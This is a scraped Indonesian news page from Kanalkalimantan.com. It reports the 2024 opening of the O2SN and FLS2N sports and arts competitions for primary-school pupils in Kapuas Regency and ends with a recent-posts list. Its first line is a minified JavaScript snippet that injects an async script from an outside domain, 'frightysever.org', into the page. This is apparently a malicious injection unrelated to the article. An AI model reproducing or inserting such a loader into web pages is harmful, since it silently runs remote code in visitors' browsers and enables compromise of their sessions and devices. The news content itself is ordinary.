(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar


KANALKALIMANTAN.COM, KUALA KAPUAS – Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan Olimpiade Olahraga Siswa Nasional (O2SN) dan Festival Lomba Seni Siswa Nasional (FLS2N) jenjang SD/MI tingkat kabupaten tahun 2024.

Pembukaan O2SN dan FLS2N 2024 di halaman kantor Dinas Pendidikan Kabupaten Kapuas, Jalan Tambun Bungai, Kuala Kapuas, Selasa (14/5/2024).

O2SN dan FLS2N 2024 dibuka secara resmi oleh Kepala Dinas Pendidikan Kabupaten Kapuas, Aswan.

Baca juga: Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

Kadisdik Kapuas, Aswan menyampaikan apresiasi atas terselenggaranya O2SN dan FLS2N tahun 2024 tingkat Kabupaten Kapuas. Aswan berpesan agar semua peserta bisa bertanding dengan menjunjung nilai sportifitas dengan baik.

“Jaga kekompakan dan kiranya kegiatan ini benar-benar bisa menjadi wadah pengembangan talenta olahraga para siswa,” pesan Aswan.

Baca juga: Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

Di akhir sambutan, Aswan memberi dukungan kepada seluruh peserta. “Berjuang sebaik mungkin karena bagi para pemenang di kabupaten akan dikirim ke tingkat provinsi,” ujarnya.

“Jadi, diharapkan melalui kegiatan ini bisa mencetak atlet-atlet muda terbaik mewakili Kabupaten Kapuas, serta siap berlaga di O2SN tingkat Provinsi Kalteng,” tandas Kadisdik Kapuas. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Muhammad Andi

Recent Posts

67 Ribu Warga Tak Lagi Ditanggung BPJS Kesehatan, Pemko Banjarmasin Upayakan Pengaktifan Kembali

KANALKALIMANTAN.COM, BANJARMASIN — Masyarakat di Kota Banjarmasin sangat terpukul dengan kebijakan penonaktifan massal kepesertaan BPJS… Read More

9 jam ago

Janji Wali Kota Yamin Tertibkan Bangunan di Atas Sungai

KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin, H Muhammad Yamin HR menyoroti bangunan yang berdiri di… Read More

11 jam ago

MAFINDO Kalsel Bekali Guru di Banjarmasin Memahami Teknologi Kecerdasan Buatan

KANALKALIMANTAN.COM, BANJARMASIN - Membuka tahun 2026, Masyarakat Anti Fitnah Indonesia (MAFINDO) Kalimantan Selatan (Kalsel) menggelar… Read More

11 jam ago

Pengelolaan UNESCO Global Geopark Meratus Diperkuat

Saat ini Ada 17 Situs Geologi Utama, 50 Titik Potensial Masih Dikaji Read More

16 jam ago

Mereka Menanti Skatepark di Kota Seribu Sungai

KANALKALIMANTAN.COM, BANJARMASIN – Sudah lama para skater menanti kehadiran skatepark di Kota Banjarmasin. Pasalnya, Siring… Read More

17 jam ago

Cek Kondisi Kolam Renang Idaman Terkini, Ini Respon Komisi III DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Komisi III Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru turun melakukan pengecekan… Read More

1 hari ago

This website uses cookies.